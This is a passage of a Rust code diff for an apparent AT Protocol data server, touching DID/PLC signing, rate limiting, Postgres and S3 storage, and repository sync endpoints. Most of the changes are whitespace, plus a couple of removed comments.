PlcError::Serialization(e.to_string()))?; ··· 195 210 let cid = cid::Cid::new_v1(0x71, multihash); 196 211 Ok(cid.to_string()) 197 212 } 213 + 198 214 pub fn sign_operation( 199 215 operation: &Value, 200 216 signing_key: &SigningKey, ··· 213 229 } 214 230 Ok(op) 215 231 } 232 + 216 233 pub fn create_update_op( 217 234 last_op: &PlcOpOrTombstone, 218 235 rotation_keys: Option<Vec<String>>, ··· 250 267 }; 251 268 serde_json::to_value(new_op).map_err(|e| PlcError::Serialization(e.to_string())) 252 269 } 270 + 253 271 pub fn signing_key_to_did_key(signing_key: &SigningKey) -> String { 254 272 let verifying_key = signing_key.verifying_key(); 255 273 let point = verifying_key.to_encoded_point(true); ··· 259 277 let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed); 260 278 format!("did:key:{}", encoded) 261 279 } 280 + 262 281 pub struct GenesisResult { 263 282 pub did: String, 264 283 pub signed_operation: Value, 265 284 } 285 + 266 286 pub fn create_genesis_operation( 267 287 signing_key: &SigningKey, 268 288 rotation_key: &str, ··· 298 318 signed_operation: signed_op, 299 319 }) 300 320 } 321 + 301 322 pub fn did_for_genesis_op(signed_op: &Value) -> Result<String, PlcError> { 302 323 let cbor_bytes = serde_ipld_dagcbor::to_vec(signed_op) 303 324 .map_err(|e| PlcError::Serialization(e.to_string()))?; ··· 308 329 let truncated = &encoded[..24]; 309 330 Ok(format!("did:plc:{}", truncated)) 310 331 } 332 + 311 333 pub fn validate_plc_operation(op: &Value) -> Result<(), PlcError> { 312 334 let obj = op.as_object() 313 335 .ok_or_else(|| PlcError::InvalidResponse("Operation must be an object".to_string()))?; ··· 336 358 } 337 359 Ok(()) 338 360 } 361 + 339 362 pub struct PlcValidationContext { 340 363 pub server_rotation_key: String, 341 364 pub expected_signing_key: String, 342 365 pub expected_handle: String, 343 366 pub expected_pds_endpoint: String, 344 367 } 368 + 345 369 pub fn validate_plc_operation_for_submission( 346 370 op: &Value, 347 371 ctx: &PlcValidationContext, ··· 407 431 } 408 432 Ok(()) 409 433 } 434 + 410 435 pub fn verify_operation_signature( 411 436 op: &Value, 412 437 rotation_keys: &[String], ··· 434 459 } 435 460 Ok(false) 436 461 } 462 + 437 463 fn verify_signature_with_did_key( 438 464 did_key: &str, 439 465 message: &[u8], ··· 461 487 .map_err(|e| PlcError::InvalidResponse(format!("Invalid public key: {}", e)))?; 462 488 Ok(verifying_key.verify(message, signature).is_ok()) 463 489 } 490 + 464 491 #[cfg(test)] 465 492 mod tests { 466 493 use super::*; 494 + 467 495 #[test] 468 496 fn test_signing_key_to_did_key() { 469 497 let key = SigningKey::random(&mut rand::thread_rng()); 470 498 let did_key = signing_key_to_did_key(&key); 471 499 assert!(did_key.starts_with("did:key:z")); 472 500 } 501 + 473 502 #[test] 474 503 fn test_cid_for_cbor() { 475 504 let value = json!({ ··· 479 508 let cid = cid_for_cbor(&value).unwrap(); 480 509 assert!(cid.starts_with("bafyrei")); 481 510 } 511 + 482 512 #[test] 483 513 fn test_sign_operation() { 484 514 let key = SigningKey::random(&mut rand::thread_rng());
+34 -5
src/rate_limit.rs
··· 16 16 num::NonZeroU32, 17 17 sync::Arc, 18 18 }; 19 + 19 20 pub type KeyedRateLimiter = RateLimiter<String, DefaultKeyedStateStore<String>, DefaultClock>; 20 21 pub type GlobalRateLimiter = RateLimiter<NotKeyed, InMemoryState, DefaultClock>; 21 - // NOTE: For production deployments with high traffic, prefer using the distributed rate 22 - // limiter (Redis/Valkey-based) via AppState::distributed_rate_limiter. The in-memory 23 - // rate limiters here don't automatically clean up expired entries, which can cause 24 - // memory growth over time with many unique client IPs. The distributed rate limiter 25 - // uses Redis TTL for automatic cleanup and works correctly across multiple instances. 22 + 26 23 #[derive(Clone)] 27 24 pub struct RateLimiters { 28 25 pub login: Arc<KeyedRateLimiter>, ··· 37 34 pub app_password: Arc<KeyedRateLimiter>, 38 35 pub email_update: Arc<KeyedRateLimiter>, 39 36 } 37 + 40 38 impl Default for RateLimiters { 41 39 fn default() -> Self { 42 40 Self::new() 43 41 } 44 42 } 43 + 45 44 impl RateLimiters { 46 45 pub fn new() -> Self { 47 46 Self { ··· 80 79 )), 81 80 } 82 81 } 82 + 83 83 pub fn with_login_limit(mut self, per_minute: u32) -> Self { 84 84 self.login = Arc::new(RateLimiter::keyed( 85 85 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 86 86 )); 87 87 self 88 88 } 89 + 89 90 pub fn with_oauth_token_limit(mut self, per_minute: u32) -> Self { 90 91 self.oauth_token = Arc::new(RateLimiter::keyed( 91 92 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(30).unwrap())) 92 93 )); 93 94 self 94 95 } 96 + 95 97 pub fn with_oauth_authorize_limit(mut self, per_minute: u32) -> Self { 96 98 self.oauth_authorize = Arc::new(RateLimiter::keyed( 97 99 Quota::per_minute(NonZeroU32::new(per_minute).unwrap_or(NonZeroU32::new(10).unwrap())) 98 100 )); 99 101 self 100 102 } 103 + 101 104 pub fn with_password_reset_limit(mut self, per_hour: u32) -> Self { 102 105 self.password_reset = Arc::new(RateLimiter::keyed( 103 106 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) 104 107 )); 105 108 self 106 109 } 110 + 107 111 pub fn with_account_creation_limit(mut self, per_hour: u32) -> Self { 108 112 self.account_creation = Arc::new(RateLimiter::keyed( 109 113 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(10).unwrap())) 110 114 )); 111 115 self 112 116 } 117 + 113 118 pub fn with_email_update_limit(mut self, per_hour: u32) -> Self { 114 119 self.email_update = Arc::new(RateLimiter::keyed( 115 120 Quota::per_hour(NonZeroU32::new(per_hour).unwrap_or(NonZeroU32::new(5).unwrap())) ··· 117 122 self 118 123 } 119 124 } 125 + 120 126 pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 121 127 if let Some(forwarded) = headers.get("x-forwarded-for") { 122 128 if let Ok(value) = forwarded.to_str() { ··· 125 131 } 126 132 } 127 133 } 134 + 128 135 if let Some(real_ip) = headers.get("x-real-ip") { 129 136 if let Ok(value) = real_ip.to_str() { 130 137 return value.trim().to_string(); 131 138 } 132 139 } 140 + 133 141 addr.map(|a| a.ip().to_string()).unwrap_or_else(|| "unknown".to_string()) 134 142 } 143 + 135 144 fn rate_limit_response() -> Response { 136 145 ( 137 146 StatusCode::TOO_MANY_REQUESTS, ··· 142 151 ) 143 152 .into_response() 144 153 } 154 + 145 155 pub async fn login_rate_limit( 146 156 ConnectInfo(addr): ConnectInfo<SocketAddr>, 147 157 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 149 159 next: Next, 150 160 ) -> Response { 151 161 let client_ip = extract_client_ip(request.headers(), Some(addr)); 162 + 152 163 if limiters.login.check_key(&client_ip).is_err() { 153 164 tracing::warn!(ip = %client_ip, "Login rate limit exceeded"); 154 165 return rate_limit_response(); 155 166 } 167 + 156 168 next.run(request).await 157 169 } 170 + 158 171 pub async fn oauth_token_rate_limit( 159 172 ConnectInfo(addr): ConnectInfo<SocketAddr>, 160 173 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 162 175 next: Next, 163 176 ) -> Response { 164 177 let client_ip = extract_client_ip(request.headers(), Some(addr)); 178 + 165 179 if limiters.oauth_token.check_key(&client_ip).is_err() { 166 180 tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded"); 167 181 return rate_limit_response(); 168 182 } 183 + 169 184 next.run(request).await 170 185 } 186 + 171 187 pub async fn password_reset_rate_limit( 172 188 ConnectInfo(addr): ConnectInfo<SocketAddr>, 173 189 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 175 191 next: Next, 176 192 ) -> Response { 177 193 let client_ip = extract_client_ip(request.headers(), Some(addr)); 194 + 178 195 if limiters.password_reset.check_key(&client_ip).is_err() { 179 196 tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded"); 180 197 return rate_limit_response(); 181 198 } 199 + 182 200 next.run(request).await 183 201 } 202 + 184 203 pub async fn account_creation_rate_limit( 185 204 ConnectInfo(addr): ConnectInfo<SocketAddr>, 186 205 axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>, ··· 188 207 next: Next, 189 208 ) -> Response { 190 209 let client_ip = extract_client_ip(request.headers(), Some(addr)); 210 + 191 211 if limiters.account_creation.check_key(&client_ip).is_err() { 192 212 tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded"); 193 213 return rate_limit_response(); 194 214 } 215 + 195 216 next.run(request).await 196 217 } 218 + 197 219 #[cfg(test)] 198 220 mod tests { 199 221 use super::*; 222 + 200 223 #[test] 201 224 fn test_rate_limiters_creation() { 202 225 let limiters = RateLimiters::new(); 203 226 assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 204 227 } 228 + 205 229 #[test] 206 230 fn test_rate_limiter_exhaustion() { 207 231 let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap())); 208 232 let key = "test_ip".to_string(); 233 + 209 234 assert!(limiter.check_key(&key).is_ok()); 210 235 assert!(limiter.check_key(&key).is_ok()); 211 236 assert!(limiter.check_key(&key).is_err()); 212 237 } 238 + 213 239 #[test] 214 240 fn test_different_keys_have_separate_limits() { 215 241 let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap())); 242 + 216 243 assert!(limiter.check_key(&"ip1".to_string()).is_ok()); 217 244 assert!(limiter.check_key(&"ip1".to_string()).is_err()); 218 245 assert!(limiter.check_key(&"ip2".to_string()).is_ok()); 219 246 } 247 + 220 248 #[test] 221 249 fn test_builder_pattern() { 222 250 let limiters = RateLimiters::new() ··· 224 252 .with_oauth_token_limit(60) 225 253 .with_password_reset_limit(3) 226 254 .with_account_creation_limit(5); 255 + 227 256 assert!(limiters.login.check_key(&"test".to_string()).is_ok()); 228 257 } 229 258 }
+9
src/repo/mod.rs
··· 6 6 use multihash::Multihash; 7 7 use sha2::{Digest, Sha256}; 8 8 use sqlx::PgPool; 9 + 9 10 pub mod tracking; 11 + 10 12 #[derive(Clone)] 11 13 pub struct PostgresBlockStore { 12 14 pool: PgPool, 13 15 } 16 + 14 17 impl PostgresBlockStore { 15 18 pub fn new(pool: PgPool) -> Self { 16 19 Self { pool } 17 20 } 18 21 } 22 + 19 23 impl BlockStore for PostgresBlockStore { 20 24 async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> { 21 25 crate::metrics::record_block_operation("get"); ··· 29 33 None => Ok(None), 30 34 } 31 35 } 36 + 32 37 async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> { 33 38 crate::metrics::record_block_operation("put"); 34 39 let mut hasher = Sha256::new(); ··· 44 49 .map_err(|e| RepoError::storage(e))?; 45 50 Ok(cid) 46 51 } 52 + 47 53 async fn has(&self, cid: &Cid) -> Result<bool, RepoError> { 48 54 crate::metrics::record_block_operation("has"); 49 55 let cid_bytes = cid.to_bytes(); ··· 53 59 .map_err(|e| RepoError::storage(e))?; 54 60 Ok(row.is_some()) 55 61 } 62 + 56 63 async fn put_many( 57 64 &self, 58 65 blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send, ··· 78 85 .map_err(|e| RepoError::storage(e))?; 79 86 Ok(()) 80 87 } 88 + 81 89 async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> { 82 90 if cids.is_empty() { 83 91 return Ok(Vec::new()); ··· 101 109 .collect(); 102 110 Ok(results) 103 111 } 112 + 104 113 async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> { 105 114 self.put_many(commit.blocks).await?; 106 115 Ok(())
+11
src/repo/tracking.rs
··· 6 6 use jacquard_repo::storage::BlockStore; 7 7 use std::collections::HashSet; 8 8 use std::sync::{Arc, Mutex}; 9 + 9 10 #[derive(Clone)] 10 11 pub struct TrackingBlockStore { 11 12 inner: PostgresBlockStore, 12 13 written_cids: Arc<Mutex<Vec<Cid>>>, 13 14 read_cids: Arc<Mutex<HashSet<Cid>>>, 14 15 } 16 + 15 17 impl TrackingBlockStore { 16 18 pub fn new(store: PostgresBlockStore) -> Self { 17 19 Self { ··· 20 22 read_cids: Arc::new(Mutex::new(HashSet::new())), 21 23 } 22 24 } 25 + 23 26 pub fn get_written_cids(&self) -> Vec<Cid> { 24 27 match self.written_cids.lock() { 25 28 Ok(guard) => guard.clone(), 26 29 Err(poisoned) => poisoned.into_inner().clone(), 27 30 } 28 31 } 32 + 29 33 pub fn get_read_cids(&self) -> Vec<Cid> { 30 34 match self.read_cids.lock() { 31 35 Ok(guard) => guard.iter().cloned().collect(), 32 36 Err(poisoned) => poisoned.into_inner().iter().cloned().collect(), 33 37 } 34 38 } 39 + 35 40 pub fn get_all_relevant_cids(&self) -> Vec<Cid> { 36 41 let written = self.get_written_cids(); 37 42 let read = self.get_read_cids(); ··· 40 45 all.into_iter().collect() 41 46 } 42 47 } 48 + 43 49 impl BlockStore for TrackingBlockStore { 44 50 async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> { 45 51 let result = self.inner.get(cid).await?; ··· 51 57 } 52 58 Ok(result) 53 59 } 60 + 54 61 async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> { 55 62 let cid = self.inner.put(data).await?; 56 63 match self.written_cids.lock() { ··· 59 66 } 60 67 Ok(cid) 61 68 } 69 + 62 70 async fn has(&self, cid: &Cid) -> Result<bool, RepoError> { 63 71 self.inner.has(cid).await 64 72 } 73 + 65 74 async fn put_many( 66 75 &self, 67 76 blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send, ··· 75 84 } 76 85 Ok(()) 77 86 } 87 + 78 88 async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> { 79 89 let results = self.inner.get_many(cids).await?; 80 90 for (cid, result) in cids.iter().zip(results.iter()) { ··· 87 97 } 88 98 Ok(results) 89 99 } 100 + 90 101 async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> { 91 102 self.put_many(commit.blocks).await?; 92 103 Ok(())
+16
src/state.rs
··· 8 8 use sqlx::PgPool; 9 9 use std::sync::Arc; 10 10 use tokio::sync::broadcast; 11 + 11 12 #[derive(Clone)] 12 13 pub struct AppState { 13 14 pub db: PgPool, ··· 19 20 pub cache: Arc<dyn Cache>, 20 21 pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>, 21 22 } 23 + 22 24 pub enum RateLimitKind { 23 25 Login, 24 26 AccountCreation, ··· 32 34 AppPassword, 33 35 EmailUpdate, 34 36 } 37 + 35 38 impl RateLimitKind { 36 39 fn key_prefix(&self) -> &'static str { 37 40 match self { ··· 48 51 Self::EmailUpdate => "email_update", 49 52 } 50 53 } 54 + 51 55 fn limit_and_window_ms(&self) -> (u32, u64) { 52 56 match self { 53 57 Self::Login => (10, 60_000), ··· 64 68 } 65 69 } 66 70 } 71 + 67 72 impl AppState { 68 73 pub async fn new(db: PgPool) -> Self { 69 74 AuthConfig::init(); 75 + 70 76 let block_store = PostgresBlockStore::new(db.clone()); 71 77 let blob_store = S3BlobStorage::new().await; 78 + 72 79 let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE") 73 80 .ok() 74 81 .and_then(|v| v.parse().ok()) 75 82 .unwrap_or(10000); 83 + 76 84 let (firehose_tx, _) = broadcast::channel(firehose_buffer_size); 77 85 let rate_limiters = Arc::new(RateLimiters::new()); 78 86 let circuit_breakers = Arc::new(CircuitBreakers::new()); 79 87 let (cache, distributed_rate_limiter) = create_cache().await; 88 + 80 89 Self { 81 90 db, 82 91 block_store, ··· 88 97 distributed_rate_limiter, 89 98 } 90 99 } 100 + 91 101 pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self { 92 102 self.rate_limiters = Arc::new(rate_limiters); 93 103 self 94 104 } 105 + 95 106 pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self { 96 107 self.circuit_breakers = Arc::new(circuit_breakers); 97 108 self 98 109 } 110 + 99 111 pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool { 100 112 if std::env::var("DISABLE_RATE_LIMITING").is_ok() { 101 113 return true; 102 114 } 115 + 103 116 let key = format!("{}:{}", kind.key_prefix(), client_ip); 104 117 let limiter_name = kind.key_prefix(); 105 118 let (limit, window_ms) = kind.limit_and_window_ms(); 119 + 106 120 if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await { 107 121 crate::metrics::record_rate_limit_rejection(limiter_name); 108 122 return false; 109 123 } 124 + 110 125 let limiter = match kind { 111 126 RateLimitKind::Login => &self.rate_limiters.login, 112 127 RateLimitKind::AccountCreation => &self.rate_limiters.account_creation, ··· 120 135 RateLimitKind::AppPassword => &self.rate_limiters.app_password, 121 136 RateLimitKind::EmailUpdate => &self.rate_limiters.email_update, 122 137 }; 138 + 123 139 let ok = limiter.check_key(&client_ip.to_string()).is_ok(); 124 140 if !ok { 125 141 crate::metrics::record_rate_limit_rejection(limiter_name);
+19 -1
src/storage/mod.rs
··· 5 5 use aws_sdk_s3::primitives::ByteStream; 6 6 use bytes::Bytes; 7 7 use thiserror::Error; 8 + 8 9 #[derive(Error, Debug)] 9 10 pub enum StorageError { 10 11 #[error("IO error: {0}")] ··· 14 15 #[error("Other: {0}")] 15 16 Other(String), 16 17 } 18 + 17 19 #[async_trait] 18 20 pub trait BlobStorage: Send + Sync { 19 21 async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>; ··· 22 24 async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>; 23 25 async fn delete(&self, key: &str) -> Result<(), StorageError>; 24 26 } 27 + 25 28 pub struct S3BlobStorage { 26 29 client: Client, 27 30 bucket: String, 28 31 } 32 + 29 33 impl S3BlobStorage { 30 34 pub async fn new() -> Self { 31 - // heheheh 32 35 let region_provider = RegionProviderChain::default_provider().or_else("us-east-1"); 36 + 33 37 let config = aws_config::defaults(BehaviorVersion::latest()) 34 38 .region(region_provider) 35 39 .load() 36 40 .await; 41 + 37 42 let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set"); 43 + 38 44 let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") { 39 45 let s3_config = aws_sdk_s3::config::Builder::from(&config) 40 46 .endpoint_url(endpoint) ··· 44 50 } else { 45 51 Client::new(&config) 46 52 }; 53 + 47 54 Self { client, bucket } 48 55 } 49 56 } 57 + 50 58 #[async_trait] 51 59 impl BlobStorage for S3BlobStorage { 52 60 async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> { 53 61 self.put_bytes(key, Bytes::copy_from_slice(data)).await 54 62 } 63 + 55 64 async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> { 56 65 let result = self.client 57 66 .put_object() ··· 61 70 .send() 62 71 .await 63 72 .map_err(|e| StorageError::S3(e.to_string())); 73 + 64 74 match &result { 65 75 Ok(_) => crate::metrics::record_s3_operation("put", "success"), 66 76 Err(_) => crate::metrics::record_s3_operation("put", "error"), 67 77 } 78 + 68 79 result?; 69 80 Ok(()) 70 81 } 82 + 71 83 async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> { 72 84 self.get_bytes(key).await.map(|b| b.to_vec()) 73 85 } 86 + 74 87 async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> { 75 88 let resp = self 76 89 .client ··· 83 96 crate::metrics::record_s3_operation("get", "error"); 84 97 StorageError::S3(e.to_string()) 85 98 })?; 99 + 86 100 let data = resp 87 101 .body 88 102 .collect() ··· 92 106 StorageError::S3(e.to_string()) 93 107 })? 94 108 .into_bytes(); 109 + 95 110 crate::metrics::record_s3_operation("get", "success"); 96 111 Ok(data) 97 112 } 113 + 98 114 async fn delete(&self, key: &str) -> Result<(), StorageError> { 99 115 let result = self.client 100 116 .delete_object() ··· 103 119 .send() 104 120 .await 105 121 .map_err(|e| StorageError::S3(e.to_string())); 122 + 106 123 match &result { 107 124 Ok(_) => crate::metrics::record_s3_operation("delete", "success"), 108 125 Err(_) => crate::metrics::record_s3_operation("delete", "error"), 109 126 } 127 + 110 128 result?; 111 129 Ok(()) 112 130 }
+5
src/sync/blob.rs
··· 10 10 use serde::{Deserialize, Serialize}; 11 11 use serde_json::json; 12 12 use tracing::error; 13 + 13 14 #[derive(Deserialize)] 14 15 pub struct GetBlobParams { 15 16 pub did: String, 16 17 pub cid: String, 17 18 } 19 + 18 20 pub async fn get_blob( 19 21 State(state): State<AppState>, 20 22 Query(params): Query<GetBlobParams>, ··· 94 96 } 95 97 } 96 98 } 99 + 97 100 #[derive(Deserialize)] 98 101 pub struct ListBlobsParams { 99 102 pub did: String, ··· 101 104 pub limit: Option<i64>, 102 105 pub cursor: Option<String>, 103 106 } 107 + 104 108 #[derive(Serialize)] 105 109 pub struct ListBlobsOutput { 106 110 pub cursor: Option<String>, 107 111 pub cids: Vec<String>, 108 112 } 113 + 109 114 pub async fn list_blobs( 110 115 State(state): State<AppState>, 111 116 Query(params): Query<ListBlobsParams>,
+3
src/sync/car.rs
··· 1 1 use cid::Cid; 2 2 use iroh_car::CarHeader; 3 3 use std::io::Write; 4 + 4 5 pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> { 5 6 loop { 6 7 let mut byte = (value & 0x7F) as u8; ··· 15 16 } 16 17 Ok(()) 17 18 } 19 + 18 20 pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> { 19 21 write_varint(&mut writer, data.len() as u64)?; 20 22 writer.write_all(data)?; 21 23 Ok(()) 22 24 } 25 + 23 26 pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> { 24 27 let header = CarHeader::new_v1(vec![root_cid.clone()]); 25 28 let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
+11
src/sync/commit.rs
··· 12 12 use serde_json::json; 13 13 use std::str::FromStr; 14 14 use tracing::error; 15 + 15 16 async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> { 16 17 let cid = Cid::from_str(cid_str).ok()?; 17 18 let block = state.block_store.get(&cid).await.ok()??; 18 19 let commit = Commit::from_cbor(&block).ok()?; 19 20 Some(commit.rev().to_string()) 20 21 } 22 + 21 23 #[derive(Deserialize)] 22 24 pub struct GetLatestCommitParams { 23 25 pub did: String, 24 26 } 27 + 25 28 #[derive(Serialize)] 26 29 pub struct GetLatestCommitOutput { 27 30 pub cid: String, 28 31 pub rev: String, 29 32 } 33 + 30 34 pub async fn get_latest_commit( 31 35 State(state): State<AppState>, 32 36 Query(params): Query<GetLatestCommitParams>, ··· 78 82 } 79 83 } 80 84 } 85 + 81 86 #[derive(Deserialize)] 82 87 pub struct ListReposParams { 83 88 pub limit: Option<i64>, 84 89 pub cursor: Option<String>, 85 90 } 91 + 86 92 #[derive(Serialize)] 87 93 #[serde(rename_all = "camelCase")] 88 94 pub struct RepoInfo { ··· 91 97 pub rev: String, 92 98 pub active: bool, 93 99 } 100 + 94 101 #[derive(Serialize)] 95 102 pub struct ListReposOutput { 96 103 pub cursor: Option<String>, 97 104 pub repos: Vec<RepoInfo>, 98 105 } 106 + 99 107 pub async fn list_repos( 100 108 State(state): State<AppState>, 101 109 Query(params): Query<ListReposParams>, ··· 154 162 } 155 163 } 156 164 } 165 + 157 166 #[derive(Deserialize)] 158 167 pub struct GetRepoStatusParams { 159 168 pub did: String, 160 169 } 170 + 161 171 #[derive(Serialize)] 162 172 pub struct GetRepoStatusOutput { 163 173 pub did: String, 164 174 pub active: bool, 165 175 pub rev: Option<String>, 166 176 } 177 + 167 178 pub async fn get_repo_status( 168 179 State(state): State<AppState>, 169 180 Query(params): Query<GetRepoStatusParams>,
+4
src/sync/crawl.rs
··· 8 8 use serde::Deserialize; 9 9 use serde_json::json; 10 10 use tracing::info; 11 + 11 12 #[derive(Deserialize)] 12 13 pub struct NotifyOfUpdateParams { 13 14 pub hostname: String, 14 15 } 16 + 15 17 pub async fn notify_of_update( 16 18 State(_state): State<AppState>, 17 19 Query(params): Query<NotifyOfUpdateParams>, ··· 19 21 info!("Received notifyOfUpdate from hostname: {}", params.hostname); 20 22 (StatusCode::OK, Json(json!({}))).into_response() 21 23 } 24 + 22 25 #[derive(Deserialize)] 23 26 pub struct RequestCrawlInput { 24 27 pub hostname: String, 25 28 } 29 + 26 30 pub async fn request_crawl( 27 31 State(_state): State<AppState>, 28 32 Json(input): Json<RequestCrawlInput>,
+7
src/sync/deprecated.rs
··· 14 14 use std::io::Write; 15 15 use std::str::FromStr; 16 16 use tracing::error; 17 + 17 18 const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000; 19 + 18 20 #[derive(Deserialize)] 19 21 pub struct GetHeadParams { 20 22 pub did: String, 21 23 } 24 + 22 25 #[derive(Serialize)] 23 26 pub struct GetHeadOutput { 24 27 pub root: String, 25 28 } 29 + 26 30 pub async fn get_head( 27 31 State(state): State<AppState>, 28 32 Query(params): Query<GetHeadParams>, ··· 63 67 } 64 68 } 65 69 } 70 + 66 71 #[derive(Deserialize)] 67 72 pub struct GetCheckoutParams { 68 73 pub did: String, 69 74 } 75 + 70 76 pub async fn get_checkout( 71 77 State(state): State<AppState>, 72 78 Query(params): Query<GetCheckoutParams>, ··· 168 174 ) 169 175 .into_response() 170 176 } 177 + 171 178 fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) { 172 179 match value { 173 180 Ipld::Link(cid) => {
+1
src/sync/firehose.rs
··· 1 1 use serde::{Deserialize, Serialize}; 2 2 use serde_json::Value; 3 3 use chrono::{DateTime, Utc}; 4 + 4 5 #[derive(Debug, Clone, Serialize, Deserialize)] 5 6 pub struct SequencedEvent { 6 7 pub seq: i64,
+13
src/sync/frame.rs
··· 2 2 use serde::{Deserialize, Serialize}; 3 3 use std::str::FromStr; 4 4 use crate::sync::firehose::SequencedEvent; 5 + 5 6 #[derive(Debug, Serialize, Deserialize)] 6 7 pub struct FrameHeader { 7 8 pub op: i64, 8 9 pub t: String, 9 10 } 11 + 10 12 #[derive(Debug, Serialize, Deserialize)] 11 13 pub struct CommitFrame { 12 14 pub seq: i64, ··· 25 27 #[serde(rename = "prevData", skip_serializing_if = "Option::is_none")] 26 28 pub prev_data: Option<Cid>, 27 29 } 30 + 28 31 #[derive(Debug, Clone, Serialize, Deserialize)] 29 32 struct JsonRepoOp { 30 33 action: String, ··· 32 35 cid: Option<String>, 33 36 prev: Option<String>, 34 37 } 38 + 35 39 #[derive(Debug, Serialize, Deserialize)] 36 40 pub struct RepoOp { 37 41 pub action: String, ··· 40 44 #[serde(skip_serializing_if = "Option::is_none")] 41 45 pub prev: Option<Cid>, 42 46 } 47 + 43 48 #[derive(Debug, Serialize, Deserialize)] 44 49 pub struct IdentityFrame { 45 50 pub did: String, ··· 48 53 pub seq: i64, 49 54 pub time: String, 50 55 } 56 + 51 57 #[derive(Debug, Serialize, Deserialize)] 52 58 pub struct AccountFrame { 53 59 pub did: String, ··· 57 63 pub seq: i64, 58 64 pub time: String, 59 65 } 66 + 60 67 #[derive(Debug, Serialize, Deserialize)] 61 68 pub struct SyncFrame { 62 69 pub did: String, ··· 66 73 pub seq: i64, 67 74 pub time: String, 68 75 } 76 + 69 77 pub struct CommitFrameBuilder { 70 78 pub seq: i64, 71 79 pub did: String, ··· 75 83 pub blobs: Vec<String>, 76 84 pub time: chrono::DateTime<chrono::Utc>, 77 85 } 86 + 78 87 impl CommitFrameBuilder { 79 88 pub fn build(self) -> Result<CommitFrame, &'static str> { 80 89 let commit_cid = Cid::from_str(&self.commit_cid_str) ··· 109 118 }) 110 119 } 111 120 } 121 + 112 122 fn placeholder_rev() -> String { 113 123 use jacquard::types::{integer::LimitedU32, string::Tid}; 114 124 Tid::now(LimitedU32::MIN).to_string() 115 125 } 126 + 116 127 fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String { 117 128 dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string() 118 129 } 130 + 119 131 impl TryFrom<SequencedEvent> for CommitFrame { 120 132 type Error = &'static str; 133 + 121 134 fn try_from(event: SequencedEvent) -> Result<Self, Self::Error> { 122 135 let builder = CommitFrameBuilder { 123 136 seq: event.seq,
+15
src/sync/import.rs
··· 9 9 use thiserror::Error; 10 10 use tracing::debug; 11 11 use uuid::Uuid; 12 + 12 13 #[derive(Error, Debug)] 13 14 pub enum ImportError { 14 15 #[error("CAR parsing error: {0}")] ··· 36 37 #[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")] 37 38 DidMismatch { car_did: String, auth_did: String }, 38 39 } 40 + 39 41 #[derive(Debug, Clone)] 40 42 pub struct BlobRef { 41 43 pub cid: String, 42 44 pub mime_type: Option<String>, 43 45 } 46 + 44 47 pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> { 45 48 let cursor = Cursor::new(data); 46 49 let mut reader = CarReader::new(cursor) ··· 61 64 } 62 65 Ok((root, blocks)) 63 66 } 67 + 64 68 pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> { 65 69 if depth > 32 { 66 70 return vec![]; ··· 91 95 _ => vec![], 92 96 } 93 97 } 98 + 94 99 pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> { 95 100 if depth > 32 { 96 101 return vec![]; ··· 124 129 _ => vec![], 125 130 } 126 131 } 132 + 127 133 pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) { 128 134 match value { 129 135 Ipld::Link(cid) => { ··· 142 148 _ => {} 143 149 } 144 150 } 